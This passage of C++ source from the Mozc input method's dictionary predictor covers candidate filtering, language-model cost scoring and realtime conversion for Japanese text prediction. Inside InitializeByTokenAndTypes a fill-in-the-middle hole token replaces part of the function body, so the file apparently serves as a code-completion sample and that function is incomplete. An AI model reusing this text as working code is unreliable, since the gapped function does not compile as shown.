candidate->wcost = result.wcost;
candidate->cost = result.cost;
candidate->attributes = result.candidate_attributes;
if ((!(candidate->attributes & Segment::Candidate::SPELLING_CORRECTION) &&
IsLatinInputMode(request)) ||
(result.types & SUFFIX)) {
candidate->attributes |= Segment::Candidate::NO_VARIANTS_EXPANSION;
candidate->attributes |= Segment::Candidate::NO_EXTRA_DESCRIPTION;
}
if (candidate->attributes & Segment::Candidate::PARTIALLY_KEY_CONSUMED) {
candidate->consumed_key_size = result.consumed_key_size;
// There are two scenarios to reach here.
// 1. Auto partial suggestion.
// e.g. composition わたしのなまえ| -> candidate 私の
// 2. Partial suggestion.
// e.g. composition わたしの|なまえ -> candidate 私の
// To distinguish auto partial suggestion from (non-auto) partial
// suggestion, see the cursor position. If the cursor is at the tail
// of the composition, this is auto partial suggestion.
if (cursor_at_tail) {
candidate->attributes |= Segment::Candidate::AUTO_PARTIAL_SUGGESTION;
}
}
candidate->source_info = result.source_info;
if (result.types & REALTIME) {
candidate->inner_segment_boundary = result.inner_segment_boundary;
}
if (result.types & TYPING_CORRECTION) {
candidate->attributes |= Segment::Candidate::TYPING_CORRECTION;
}
SetDescription(result.types, candidate->attributes,
&candidate->description);
if (is_debug) {
SetDebugDescription(merged_types[result.value], &candidate->description);
}
#ifdef MOZC_DEBUG
candidate->log += "\n" + result.log;
#endif // MOZC_DEBUG
};
#ifdef MOZC_DEBUG
auto add_debug_candidate = [&](Result result, const std::string &log) {
std::string key, value;
if (result.types & BIGRAM) {
// remove the prefix of history key and history value.
key = result.key.substr(history_key.size(),
result.key.size() - history_key.size());
value = result.value.substr(history_value.size(),
result.value.size() - history_value.size());
} else {
key = result.key;
value = result.value;
}
result.log.append(log);
Segment::Candidate candidate;
add_candidate(result, key, value, &candidate);
segment->removed_candidates_for_debug_.push_back(std::move(candidate));
};
#define MOZC_ADD_DEBUG_CANDIDATE(result, log) \
add_debug_candidate(result, MOZC_WORD_LOG_MESSAGE(log))
#else // MOZC_DEBUG
#define MOZC_ADD_DEBUG_CANDIDATE(result, log) \
{}
#endif // MOZC_DEBUG
for (size_t i = 0; i < results->size(); ++i) {
// Pop a result from a heap. Please pay attention not to use results->at(i).
std::pop_heap(results->begin(), results->end() - i, ResultCostLess());
const Result &result = results->at(results->size() - i - 1);
if (added >= size || result.cost >= kInfinity) {
break;
}
if (result.removed) {
MOZC_ADD_DEBUG_CANDIDATE(result, "Removed flag is on");
continue;
}
// When |include_exact_key| is true, we don't filter the results
// which have the exactly same key as the input even if it's a bad
// suggestion.
if (!(include_exact_key && (result.key == input_key)) &&
suggestion_filter_->IsBadSuggestion(result.value)) {
MOZC_ADD_DEBUG_CANDIDATE(result, "Bad suggestion");
continue;
}
// Don't suggest exactly the same candidate as key.
// if |include_exact_key| is true, that's not the case.
if (!include_exact_key && !(result.types & REALTIME) &&
(((result.types & BIGRAM) && exact_bigram_key == result.value) ||
(!(result.types & BIGRAM) && input_key == result.value))) {
MOZC_ADD_DEBUG_CANDIDATE(result, "Key == candidate");
continue;
}
std::string key, value;
if (result.types & BIGRAM) {
// remove the prefix of history key and history value.
key = result.key.substr(history_key.size(),
result.key.size() - history_key.size());
value = result.value.substr(history_value.size(),
result.value.size() - history_value.size());
} else {
key = result.key;
value = result.value;
}
if (!seen.insert(value).second) {
MOZC_ADD_DEBUG_CANDIDATE(result, "Duplicated");
continue;
}
// User input: "おーすとり" (len = 5)
// key/value: "おーすとりら" "オーストラリア" (miss match pos = 4)
if ((result.candidate_attributes &
Segment::Candidate::SPELLING_CORRECTION) &&
key != input_key &&
input_key_len <= GetMissSpelledPosition(key, value) + 1) {
MOZC_ADD_DEBUG_CANDIDATE(result, "Spelling correction");
continue;
}
if (result.types == SUFFIX && added_suffix++ >= 20) {
// TODO(toshiyuki): Need refactoring for controlling suffix
// prediction number after we will fix the appropriate number.
MOZC_ADD_DEBUG_CANDIDATE(result, "Added suffix >= 20");
continue;
}
Segment::Candidate *candidate = segment->push_back_candidate();
add_candidate(result, key, value, candidate);
++added;
}
return added > 0;
#undef MOZC_ADD_DEBUG_CANDIDATE
}
DictionaryPredictor::PredictionTypes
DictionaryPredictor::AggregatePredictionForZeroQuery(
const ConversionRequest &request, Segments *segments,
std::vector<Result> *results) const {
DCHECK(segments);
DCHECK(results);
if (!request.request().zero_query_suggestion()) {
// Zero query is disabled by request.
return NO_PREDICTION;
}
PredictionTypes selected_types = NO_PREDICTION;
constexpr int kMinHistoryKeyLenForZeroQuery = 2;
if (HasHistoryKeyLongerThanOrEqualTo(*segments,
kMinHistoryKeyLenForZeroQuery)) {
AggregateBigramPrediction(
request, *segments,
Segment::Candidate::DICTIONARY_PREDICTOR_ZERO_QUERY_BIGRAM, results);
selected_types |= BIGRAM;
}
if (segments->history_segments_size() > 0) {
AggregateZeroQuerySuffixPrediction(request, *segments, results);
selected_types |= SUFFIX;
}
return selected_types;
}
DictionaryPredictor::PredictionType
DictionaryPredictor::AggregateUnigramCandidateForLatinInput(
const ConversionRequest &request, const Segments &segments,
std::vector<Result> *results) const {
AggregateEnglishPrediction(request, segments, results);
return ENGLISH;
}
void DictionaryPredictor::SetDescription(PredictionTypes types,
uint32_t attributes,
std::string *description) {
if (types & TYPING_CORRECTION) {
Util::AppendStringWithDelimiter(" ", "補正", description);
}
if (attributes & Segment::Candidate::AUTO_PARTIAL_SUGGESTION) {
Util::AppendStringWithDelimiter(" ", "部分", description);
}
}
void DictionaryPredictor::SetDebugDescription(PredictionTypes types,
std::string *description) {
std::string debug_desc;
if (types & UNIGRAM) {
debug_desc.append(1, 'U');
}
if (types & BIGRAM) {
debug_desc.append(1, 'B');
}
if (types & REALTIME_TOP) {
debug_desc.append("R1");
} else if (types & REALTIME) {
debug_desc.append(1, 'R');
}
if (types & SUFFIX) {
debug_desc.append(1, 'S');
}
if (types & ENGLISH) {
debug_desc.append(1, 'E');
}
// Note that description for TYPING_CORRECTION is omitted
// because it is appended by SetDescription.
if (!debug_desc.empty()) {
Util::AppendStringWithDelimiter(" ", debug_desc, description);
}
}
// Returns cost for |result| when it's transitioned from |rid|. Suffix penalty
// is also added for non-realtime results.
int DictionaryPredictor::GetLMCost(const Result &result, int rid) const {
const int cost_with_context = connector_->GetTransitionCost(rid, result.lid);
int lm_cost = 0;
if (result.types & SUFFIX) {
// We always respect the previous context to calculate the cost of SUFFIX.
// Otherwise, the suffix that doesn't match the context will be promoted.
lm_cost = cost_with_context + result.wcost;
} else {
// Sometimes transition cost is too high and causes a bug like b/18112966.
// For example, "接続詞 が" -> "始まる 動詞,五段活用,基本形" has very large
// cost and "始まる" is demoted. To prevent such cases, ImmutableConverter
// computes transition from BOS/EOS too; see
// ImmutableConverterImpl::MakeLatticeNodesForHistorySegments().
// Here, taking the minimum of |cost1| and |cost2| has a similar effect.
const int cost_without_context =
connector_->GetTransitionCost(0, result.lid);
lm_cost = std::min(cost_with_context, cost_without_context) + result.wcost;
}
if (!(result.types & REALTIME)) {
// Relatime conversion already adds perfix/suffix penalties to the result.
// Note that we don't add prefix penalty the role of "bunsetsu" is
// ambiguous on zero-query suggestion.
lm_cost += segmenter_->GetSuffixPenalty(result.rid);
}
return lm_cost;
}
namespace {
class FindValueCallback : public DictionaryInterface::Callback {
public:
explicit FindValueCallback(absl::string_view target_value)
: target_value_(target_value), found_(false) {}
ResultType OnToken(absl::string_view, // key
absl::string_view, // actual_key
const Token &token) override {
if (token.value != target_value_) {
return TRAVERSE_CONTINUE;
}
found_ = true;
token_ = token;
return TRAVERSE_DONE;
}
bool found() const { return found_; }
const Token &token() const { return token_; }
private:
absl::string_view target_value_;
bool found_;
Token token_;
DISALLOW_COPY_AND_ASSIGN(FindValueCallback);
};
} // namespace
void DictionaryPredictor::Result::InitializeByTokenAndTypes(
const Token &token, PredictionTypes types) {<|fim▁hole|> lid = token.lid;
rid = token.rid;
}
void DictionaryPredictor::Result::SetTypesAndTokenAttributes(
PredictionTypes prediction_types, Token::AttributesBitfield token_attr) {
types = prediction_types;
candidate_attributes = 0;
if (types & TYPING_CORRECTION) {
candidate_attributes |= Segment::Candidate::TYPING_CORRECTION;
}
if (types & (REALTIME | REALTIME_TOP)) {
candidate_attributes |= Segment::Candidate::REALTIME_CONVERSION;
}
if (token_attr & Token::SPELLING_CORRECTION) {
candidate_attributes |= Segment::Candidate::SPELLING_CORRECTION;
}
if (token_attr & Token::USER_DICTIONARY) {
candidate_attributes |= (Segment::Candidate::USER_DICTIONARY |
Segment::Candidate::NO_VARIANTS_EXPANSION);
}
}
void DictionaryPredictor::Result::SetSourceInfoForZeroQuery(
ZeroQueryType type) {
switch (type) {
case ZERO_QUERY_NONE:
source_info |= Segment::Candidate::DICTIONARY_PREDICTOR_ZERO_QUERY_NONE;
return;
case ZERO_QUERY_NUMBER_SUFFIX:
source_info |=
Segment::Candidate::DICTIONARY_PREDICTOR_ZERO_QUERY_NUMBER_SUFFIX;
return;
case ZERO_QUERY_EMOTICON:
source_info |=
Segment::Candidate::DICTIONARY_PREDICTOR_ZERO_QUERY_EMOTICON;
return;
case ZERO_QUERY_EMOJI:
source_info |= Segment::Candidate::DICTIONARY_PREDICTOR_ZERO_QUERY_EMOJI;
return;
case ZERO_QUERY_BIGRAM:
source_info |= Segment::Candidate::DICTIONARY_PREDICTOR_ZERO_QUERY_BIGRAM;
return;
case ZERO_QUERY_SUFFIX:
source_info |= Segment::Candidate::DICTIONARY_PREDICTOR_ZERO_QUERY_SUFFIX;
return;
default:
LOG(ERROR) << "Should not come here";
return;
}
}
bool DictionaryPredictor::Result::IsUserDictionaryResult() const {
return (candidate_attributes & Segment::Candidate::USER_DICTIONARY) != 0;
}
// Here, we treat the word as English when its key consists of Latin
// characters.
bool DictionaryPredictor::Result::IsEnglishEntryResult() const {
return Util::IsEnglishTransliteration(key);
}
bool DictionaryPredictor::GetHistoryKeyAndValue(const Segments &segments,
std::string *key,
std::string *value) const {
DCHECK(key);
DCHECK(value);
if (segments.history_segments_size() == 0) {
return false;
}
const Segment &history_segment =
segments.history_segment(segments.history_segments_size() - 1);
if (history_segment.candidates_size() == 0) {
return false;
}
key->assign(history_segment.candidate(0).key);
value->assign(history_segment.candidate(0).value);
return true;
}
void DictionaryPredictor::SetPredictionCost(
const Segments &segments, std::vector<Result> *results) const {
DCHECK(results);
int rid = 0; // 0 (BOS) is default
if (segments.history_segments_size() > 0) {
const Segment &history_segment =
segments.history_segment(segments.history_segments_size() - 1);
if (history_segment.candidates_size() > 0) {
rid = history_segment.candidate(0).rid; // use history segment's id
}
}
const std::string &input_key = segments.conversion_segment(0).key();
std::string history_key, history_value;
GetHistoryKeyAndValue(segments, &history_key, &history_value);
const std::string bigram_key = history_key + input_key;
const bool is_suggestion = (segments.request_type() == Segments::SUGGESTION);
// use the same scoring function for both unigram/bigram.
// Bigram will be boosted because we pass the previous
// key as a context information.
const size_t bigram_key_len = Util::CharsLen(bigram_key);
const size_t unigram_key_len = Util::CharsLen(input_key);
// In the loop below, we track the minimum cost among those REALTIME
// candidates that have the same key length as |input_key| so that we can set
// a slightly smaller cost to REALTIME_TOP than these.
int realtime_cost_min = kInfinity;
Result *realtime_top_result = nullptr;
for (size_t i = 0; i < results->size(); ++i) {
const Result &result = results->at(i);
// The cost of REALTIME_TOP is determined after the loop based on the
// minimum cost for REALTIME. Just remember the pointer of result.
if (result.types & REALTIME_TOP) {
realtime_top_result = &results->at(i);
continue;
}
const int cost = GetLMCost(result, rid);
const size_t query_len =
(result.types & BIGRAM) ? bigram_key_len : unigram_key_len;
const size_t key_len = Util::CharsLen(result.key);
if (IsAggressiveSuggestion(query_len, key_len, cost, is_suggestion,
results->size())) {
results->at(i).cost = kInfinity;
continue;
}
// cost = -500 * log(lang_prob(w) * (1 + remain_length)) -- (1)
// where lang_prob(w) is a language model probability of the word "w", and
// remain_length the length of key user must type to input "w".
//
// Example:
// key/value = "とうきょう/東京"
// user_input = "とう"
// remain_length = len("とうきょう") - len("とう") = 3
//
// By taking the log of (1),
// cost = -500 [log(lang_prob(w)) + log(1 + ramain_length)]
// = -500 * log(lang_prob(w)) + 500 * log(1 + remain_length)
// = cost - 500 * log(1 + remain_length)
// Because 500 * log(lang_prob(w)) = -cost.
//
// lang_prob(w) * (1 + remain_length) represents how user can reduce
// the total types by choosing this candidate.
// Before this simple algorithm, we have been using an SVM-base scoring,
// but we stop usign it with the following reasons.
// 1) Hard to maintain the ranking.
// 2) Hard to control the final results of SVM.
// 3) Hard to debug.
// 4) Since we used the log(remain_length) as a feature,
// the new ranking algorithm and SVM algorithm was essentially
// the same.
// 5) Since we used the length of value as a feature, we find
// inconsistencies between the conversion and the prediction
// -- the results of top prediction and the top conversion
// (the candidate shown after the space key) may differ.
//
// The new function brings consistent results. If two candidate
// have the same reading (key), they should have the same cost bonus
// from the length part. This implies that the result is reranked by
// the language model probability as long as the key part is the same.
// This behavior is baisically the same as the converter.
//
// TODO(team): want find the best parameter instead of kCostFactor.
constexpr int kCostFactor = 500;
results->at(i).cost =
cost - kCostFactor * log(1.0 + std::max<int>(0, key_len - query_len));
// Update the minimum cost for REALTIME candidates that have the same key
// length as input_key.
if (result.types & REALTIME && result.cost < realtime_cost_min &&
result.key.size() == input_key.size()) {
realtime_cost_min = result.cost;
}
}
// Ensure that the REALTIME_TOP candidate has relatively smaller cost than
// those of REALTIME candidates.
if (realtime_top_result != nullptr) {
realtime_top_result->cost = std::max(0, realtime_cost_min - 10);
}
}
void DictionaryPredictor::SetPredictionCostForMixedConversion(
const Segments &segments, std::vector<Result> *results) const {
DCHECK(results);
// ranking for mobile
int rid = 0; // 0 (BOS) is default
int prev_cost = 0; // cost of the last history candidate.
if (segments.history_segments_size() > 0) {
const Segment &history_segment =
segments.history_segment(segments.history_segments_size() - 1);
if (history_segment.candidates_size() > 0) {
rid = history_segment.candidate(0).rid; // use history segment's id
prev_cost = history_segment.candidate(0).cost;
if (prev_cost == 0) {
// if prev_cost is set to be 0 for some reason, use default cost.
prev_cost = 5000;
}
}
}
const size_t input_key_len =
Util::CharsLen(segments.conversion_segment(0).key());
for (Result &result : *results) {
int cost = GetLMCost(result, rid);
MOZC_WORD_LOG(result, absl::StrCat("GetLMCost: ", cost));
// Demote filtered word here, because they are not filtered for exact match.
// Even for exact match, we don't want to show aggressive words with high
// ranking.
if (suggestion_filter_->IsBadSuggestion(result.value)) {
// Cost penalty means for bad suggestion.
// 3453 = 500 * log(1000)
constexpr int kBadSuggestionPenalty = 3453;
cost += kBadSuggestionPenalty;
MOZC_WORD_LOG(result, absl::StrCat("BadSuggestionPenalty: ", cost));
}
// Make exact candidates to have higher ranking.
// Because for mobile, suggestion is the main candidates and
// users expect the candidates for the input key on the candidates.
if (result.types & (UNIGRAM | TYPING_CORRECTION)) {
const size_t key_len = Util::CharsLen(result.key);
if (key_len > input_key_len) {
// Cost penalty means that exact candidates are evaluated
// 50 times bigger in frequency.
// Note that the cost is calculated by cost = -500 * log(prob)
// 1956 = 500 * log(50)
constexpr int kNotExactPenalty = 1956;
cost += kNotExactPenalty;
MOZC_WORD_LOG(result,
absl::StrCat("Unigram | Typing correction: ", cost));
}
}
if (result.types & BIGRAM) {
// When user inputs "六本木" and there is an entry
// "六本木ヒルズ" in the dictionary, we can suggest
// "ヒルズ" as a ZeroQuery suggestion. In this case,
// We can't calcurate the transition cost between "六本木"
// and "ヒルズ". If we ignore the transition cost,
// bigram-based suggestion will be overestimated.
// Here we use kDefaultTransitionCost as an
// transition cost between "六本木" and "ヒルズ". Currently,
// the cost is basically the same as the cost between
// "名詞,一般" and "名詞,一般".
// TODO(taku): Adjust these parameters.
// Seems the bigram is overestimated.
constexpr int kDefaultTransitionCost = 1347;
// Promoting bigram candidates.
constexpr int kBigramBonus = 800; // ~= 500*ln(5)
cost += (kDefaultTransitionCost - kBigramBonus - prev_cost);
MOZC_WORD_LOG(result, absl::StrCat("Bigram: ", cost));
}
if (result.candidate_attributes & Segment::Candidate::USER_DICTIONARY &&
result.lid != general_symbol_id_) {
// Decrease cost for words from user dictionary in order to promote them,
// provided that it is not a general symbol (Note: emoticons are mapped to
// general symbol). Currently user dictionary words are evaluated 5 times
// bigger in frequency, being capped by 1000 (this number is adhoc, so
// feel free to adjust).
constexpr int kUserDictionaryPromotionFactor = 804; // 804 = 500 * log(5)
constexpr int kUserDictionaryCostUpperLimit = 1000;
cost = std::min(cost - kUserDictionaryPromotionFactor,
kUserDictionaryCostUpperLimit);
MOZC_WORD_LOG(result, absl::StrCat("User dictionary: ", cost));
}
// Note that the cost is defined as -500 * log(prob).
// Even after the ad hoc manipulations, cost must remain larger than 0.
result.cost = std::max(1, cost);
MOZC_WORD_LOG(result, absl::StrCat("SetLMCost: ", result.cost));
}
}
// This method should be deprecated, as it is unintentionally adding extra
// spatial penalty to the candidate.
void DictionaryPredictor::ApplyPenaltyForKeyExpansion(
const Segments &segments, std::vector<Result> *results) const {
if (segments.conversion_segments_size() == 0) {
return;
}
// Cost penalty 1151 means that expanded candidates are evaluated
// 10 times smaller in frequency.
// Note that the cost is calcurated by cost = -500 * log(prob)
// 1151 = 500 * log(10)
constexpr int kKeyExpansionPenalty = 1151;
const std::string &conversion_key = segments.conversion_segment(0).key();
for (size_t i = 0; i < results->size(); ++i) {
Result &result = results->at(i);
if (result.types & TYPING_CORRECTION) {
continue;
}
if (!absl::StartsWith(result.key, conversion_key)) {
result.cost += kKeyExpansionPenalty;
MOZC_WORD_LOG(result, absl::StrCat("KeyExpansionPenalty: ", result.cost));
}
}
}
size_t DictionaryPredictor::GetMissSpelledPosition(
const std::string &key, const std::string &value) const {
std::string hiragana_value;
japanese_util::KatakanaToHiragana(value, &hiragana_value);
// value is mixed type. return true if key == request_key.
if (Util::GetScriptType(hiragana_value) != Util::HIRAGANA) {
return Util::CharsLen(key);
}
// Find the first position of character where miss spell occurs.
int position = 0;
ConstChar32Iterator key_iter(key);
for (ConstChar32Iterator hiragana_iter(hiragana_value);
!hiragana_iter.Done() && !key_iter.Done();
hiragana_iter.Next(), key_iter.Next(), ++position) {
if (hiragana_iter.Get() != key_iter.Get()) {
return position;
}
}
// not find. return the length of key.
while (!key_iter.Done()) {
++position;
key_iter.Next();
}
return position;
}
void DictionaryPredictor::RemoveMissSpelledCandidates(
size_t request_key_len, std::vector<Result> *results) const {
DCHECK(results);
if (results->size() <= 1) {
return;
}
int spelling_correction_size = 5;
for (size_t i = 0; i < results->size(); ++i) {
const Result &result = (*results)[i];
if (!(result.candidate_attributes &
Segment::Candidate::SPELLING_CORRECTION)) {
continue;
}
// Only checks at most 5 spelling corrections to avoid the case
// like all candidates have SPELLING_CORRECTION.
if (--spelling_correction_size == 0) {
return;
}
std::vector<size_t> same_key_index, same_value_index;
for (size_t j = 0; j < results->size(); ++j) {
if (i == j) {
continue;
}
const Result &target_result = (*results)[j];
if (target_result.candidate_attributes &
Segment::Candidate::SPELLING_CORRECTION) {
continue;
}
if (target_result.key == result.key) {
same_key_index.push_back(j);
}
if (target_result.value == result.value) {
same_value_index.push_back(j);
}
}
// delete same_key_index and same_value_index
if (!same_key_index.empty() && !same_value_index.empty()) {
results->at(i).removed = true;
MOZC_WORD_LOG(results->at(i), "Removed. same_(key|value)_index.");
for (size_t k = 0; k < same_key_index.size(); ++k) {
results->at(same_key_index[k]).removed = true;
MOZC_WORD_LOG(results->at(i), "Removed. same_(key|value)_index.");
}
} else if (same_key_index.empty() && !same_value_index.empty()) {
results->at(i).removed = true;
MOZC_WORD_LOG(results->at(i), "Removed. same_value_index.");
} else if (!same_key_index.empty() && same_value_index.empty()) {
for (size_t k = 0; k < same_key_index.size(); ++k) {
results->at(same_key_index[k]).removed = true;
MOZC_WORD_LOG(results->at(i), "Removed. same_key_index.");
}
if (request_key_len <= GetMissSpelledPosition(result.key, result.value)) {
results->at(i).removed = true;
MOZC_WORD_LOG(results->at(i), "Removed. Invalid MissSpelledPosition.");
}
}
}
}
bool DictionaryPredictor::IsAggressiveSuggestion(
size_t query_len, size_t key_len, int cost, bool is_suggestion,
size_t total_candidates_size) const {
// Temporal workaround for fixing the problem where longer sentence-like
// suggestions are shown when user input is very short.
// "ただしい" => "ただしいけめんにかぎる"
// "それでもぼ" => "それでもぼくはやっていない".
// If total_candidates_size is small enough, we don't perform
// special filtering. e.g., "せんとち" has only two candidates, so
// showing "千と千尋の神隠し" is OK.
// Also, if the cost is too small (< 5000), we allow to display
// long phrases. Examples include "よろしくおねがいします".
if (is_suggestion && total_candidates_size >= 10 && key_len >= 8 &&
cost >= 5000 && query_len <= static_cast<size_t>(0.4 * key_len)) {
return true;
}
return false;
}
size_t DictionaryPredictor::GetRealtimeCandidateMaxSize(
const ConversionRequest &request, const Segments &segments,
bool mixed_conversion) const {
const Segments::RequestType request_type = segments.request_type();
DCHECK(request_type == Segments::PREDICTION ||
request_type == Segments::SUGGESTION ||
request_type == Segments::PARTIAL_PREDICTION ||
request_type == Segments::PARTIAL_SUGGESTION);
if (segments.conversion_segments_size() == 0) {
return 0;
}
const bool is_long_key = IsLongKeyForRealtimeCandidates(segments);
const size_t max_size =
GetMaxSizeForRealtimeCandidates(request, segments, is_long_key);
const size_t default_size = GetDefaultSizeForRealtimeCandidates(is_long_key);
size_t size = 0;
switch (request_type) {
case Segments::PREDICTION:
size = mixed_conversion ? max_size : default_size;
break;
case Segments::SUGGESTION:
// Fewer candidatats are needed basically.
// But on mixed_conversion mode we should behave like as conversion mode.
size = mixed_conversion ? default_size : 1;
break;
case Segments::PARTIAL_PREDICTION:
// This is kind of prediction so richer result than PARTIAL_SUGGESTION
// is needed.
size = max_size;
break;
case Segments::PARTIAL_SUGGESTION:
// PARTIAL_SUGGESTION works like as conversion mode so returning
// some candidates is needed.
size = default_size;
break;
default:
size = 0; // Never reach here
}
return std::min(max_size, size);
}
bool DictionaryPredictor::PushBackTopConversionResult(
const ConversionRequest &request, const Segments &segments,
std::vector<Result> *results) const {
DCHECK_EQ(1, segments.conversion_segments_size());
Segments tmp_segments = segments;
ConversionRequest tmp_request = request;
tmp_request.set_max_conversion_candidates_size(20);
tmp_request.set_composer_key_selection(ConversionRequest::PREDICTION_KEY);
// Some rewriters cause significant performance loss. So we skip them.
tmp_request.set_skip_slow_rewriters(true);
// This method emulates usual converter's behavior so here disable
// partial candidates.
tmp_request.set_create_partial_candidates(false);
if (!converter_->StartConversionForRequest(tmp_request, &tmp_segments)) {
return false;
}
results->push_back(Result());
Result *result = &results->back();
result->key = segments.conversion_segment(0).key();
result->lid = tmp_segments.conversion_segment(0).candidate(0).lid;
result->rid =
tmp_segments
.conversion_segment(tmp_segments.conversion_segments_size() - 1)
.candidate(0)
.rid;
result->SetTypesAndTokenAttributes(REALTIME | REALTIME_TOP, Token::NONE);
result->candidate_attributes |= Segment::Candidate::NO_VARIANTS_EXPANSION;
// Concatenate the top candidates.
// Note that since StartConversionForRequest() runs in conversion mode, the
// resulting |tmp_segments| doesn't have inner_segment_boundary. We need to
// construct it manually here.
// TODO(noriyukit): This is code duplicate in converter/nbest_generator.cc and
// we should refactor code after finding more good design.
bool inner_segment_boundary_success = true;
for (size_t i = 0; i < tmp_segments.conversion_segments_size(); ++i) {
const Segment &segment = tmp_segments.conversion_segment(i);
const Segment::Candidate &candidate = segment.candidate(0);
result->value.append(candidate.value);
result->wcost += candidate.cost;
uint32_t encoded_lengths;
if (inner_segment_boundary_success &&
Segment::Candidate::EncodeLengths(
candidate.key.size(), candidate.value.size(),
candidate.content_key.size(), candidate.content_value.size(),
&encoded_lengths)) {
result->inner_segment_boundary.push_back(encoded_lengths);
} else {
inner_segment_boundary_success = false;
}
}
if (!inner_segment_boundary_success) {
LOG(WARNING) << "Failed to construct inner segment boundary";
result->inner_segment_boundary.clear();
}
return true;
}
void DictionaryPredictor::AggregateRealtimeConversion(
const ConversionRequest &request, size_t realtime_candidates_size,
Segments *segments, std::vector<Result> *results) const {
DCHECK(converter_);
DCHECK(immutable_converter_);
DCHECK(segments);
DCHECK(results);
// TODO(noriyukit): Currently, |segments| is abused as a temporary output from
// the immutable converter. Therefore, the first segment needs to be mutable.
// Fix this bad abuse.
Segment *segment = segments->mutable_conversion_segment(0);
DCHECK(!segment->key().empty());
// First insert a top conversion result.
if (request.use_actual_converter_for_realtime_conversion()) {
if (!PushBackTopConversionResult(request, *segments, results)) {
LOG(WARNING) << "Realtime conversion with converter failed";
}
}
if (realtime_candidates_size == 0) {
return;
}
// In what follows, add results from immutable converter.
// TODO(noriyukit): The |immutable_converter_| used below can be replaced by
// |converter_| in principle. There's a problem of ranking when we get
// multiple segments, i.e., how to concatenate candidates in each segment.
// Currently, immutable converter handles such ranking in prediction mode to
// generate single segment results. So we want to share that code.
// Preserve the current candidates_size to restore segments at the end of this
// method.
const size_t prev_candidates_size = segment->candidates_size();
const ConversionRequest request_for_realtime =
GetConversionRequestForRealtimeCandidates(
request, realtime_candidates_size, prev_candidates_size);
if (!immutable_converter_->ConvertForRequest(request_for_realtime,
segments) ||
prev_candidates_size >= segment->candidates_size()) {
LOG(WARNING) << "Convert failed";
return;
}
// A little tricky treatment:
// Since ImmutableConverter::Convert creates a set of new candidates,
// copy them into the array of Results.
for (size_t i = prev_candidates_size; i < segment->candidates_size(); ++i) {
const Segment::Candidate &candidate = segment->candidate(i);
results->push_back(Result());
Result *result = &results->back();
result->key = candidate.key;
result->value = candidate.value;
result->wcost = candidate.wcost;
result->lid = candidate.lid;
result->rid = candidate.rid;
result->inner_segment_boundary = candidate.inner_segment_boundary;
result->SetTypesAndTokenAttributes(REALTIME, Token::NONE);
result->candidate_attributes |= candidate.attributes;
result->consumed_key_size = candidate.consumed_key_size;
}
// Remove candidates created by ImmutableConverter.
segment->erase_candidates(prev_candidates_size,
segment->candidates_size() - prev_candidates_size);
}
size_t DictionaryPredictor::GetCandidateCutoffThreshold(
const Segments &segments) const {
DCHECK(segments.request_type() == Segments::PREDICTION ||
segments.request_type() == Segments::SUGGESTION);
if (segments.request_type() == Segments::PREDICTION) {
// If PREDICTION, many candidates are needed than SUGGESTION.
return kPredictionMaxResultsSize;
}
return kSuggestionMaxResultsSize;
}
DictionaryPredictor::PredictionType
DictionaryPredictor::AggregateUnigramCandidate(
const ConversionRequest &request, const Segments &segments,
std::vector<Result> *results) const {
DCHECK(results);
DCHECK(dictionary_);
DCHECK(segments.request_type() == Segments::PREDICTION ||
segments.request_type() == Segments::SUGGESTION);
const size_t cutoff_threshold = GetCandidateCutoffThreshold(segments);
const size_t prev_results_size = results->size();
GetPredictiveResults(*dictionary_, "", request, segments, UNIGRAM,
cutoff_threshold, Segment::Candidate::SOURCE_INFO_NONE,
unknown_id_, results);
const size_t unigram_results_size = results->size() - prev_results_size;
// If size reaches max_results_size (== cutoff_threshold).
// we don't show the candidates, since disambiguation from
// 256 candidates is hard. (It may exceed max_results_size, because this is
// just a limit for each backend, so total number may be larger)
if (unigram_results_size >= cutoff_threshold) {
results->resize(prev_results_size);
}
return UNIGRAM;
}
DictionaryPredictor::PredictionType
DictionaryPredictor::AggregateUnigramCandidateForMixedConversion(
const ConversionRequest &request, const Segments &segments,
std::vector<Result> *results) const {
DCHECK(segments.request_type() == Segments::PREDICTION ||
segments.request_type() == Segments::SUGGESTION);
AggregateUnigramCandidateForMixedConversion(*dictionary_, request, segments,
unknown_id_, results);
return UNIGRAM;
}
void DictionaryPredictor::AggregateUnigramCandidateForMixedConversion(
const dictionary::DictionaryInterface &dictionary,
const ConversionRequest &request, const Segments &segments, int unknown_id,
std::vector<Result> *results) {
const size_t cutoff_threshold = kPredictionMaxResultsSize;
std::vector<Result> raw_result;
// No history key
GetPredictiveResults(dictionary, "", request, segments, UNIGRAM,
cutoff_threshold, Segment::Candidate::SOURCE_INFO_NONE,
unknown_id, &raw_result);
// Hereafter, we split "Needed Results" and "(maybe) Unneeded Results."
// The algorithm is:
// 1) Take the Result with minimum cost.
// 2) Remove results which is "redundant" (defined by MaybeRedundant),
// from remaining results.
// 3) Repeat 1) and 2) five times.
// Note: to reduce the number of memory allocation, we swap out the
// "redundant" results to the end of the |results| vector.
constexpr size_t kDeleteTrialNum = 5;
// min_iter is the beginning of the remaining results (inclusive), and
// max_iter is the end of the remaining results (exclusive).
typedef std::vector<Result>::iterator Iter;
Iter min_iter = raw_result.begin();
Iter max_iter = raw_result.end();
for (size_t i = 0; i < kDeleteTrialNum; ++i) {
if (min_iter == max_iter) {
break;
}
// Find the Result with minimum cost. Swap it with the beginning element.
std::iter_swap(min_iter,
std::min_element(min_iter, max_iter, ResultWCostLess()));
const Result &reference_result = *min_iter;
// Preserve the reference result.
++min_iter;
// Traverse all remaining elements and check if each result is redundant.
for (Iter iter = min_iter; iter != max_iter;) {
// - We do not filter user dictionary word.
const bool should_check_redundant = !iter->IsUserDictionaryResult();
if (should_check_redundant &&
MaybeRedundant(reference_result.value, iter->value)) {
// Swap out the redundant result.
--max_iter;
std::iter_swap(iter, max_iter);
} else {
++iter;
}
}
}
// Then the |raw_result| contains;
// [begin, min_iter): reference results in the above loop.
// [max_iter, end): (maybe) redundant results.
// [min_iter, max_iter): remaining results.
// Here, we revive the redundant results up to five in the result cost order.
constexpr size_t kDoNotDeleteNum = 5;
if (std::distance(max_iter, raw_result.end()) >= kDoNotDeleteNum) {
std::partial_sort(max_iter, max_iter + kDoNotDeleteNum, raw_result.end(),
ResultWCostLess());
max_iter += kDoNotDeleteNum;
} else {
max_iter = raw_result.end();
}
// Finally output the result.
results->insert(results->end(), raw_result.begin(), max_iter);
}
void DictionaryPredictor::AggregateBigramPrediction(
const ConversionRequest &request, const Segments &segments,
Segment::Candidate::SourceInfo source_info,
std::vector<Result> *results) const {
DCHECK(results);
DCHECK(dictionary_);
// TODO(toshiyuki): Support suggestion from the last 2 histories.
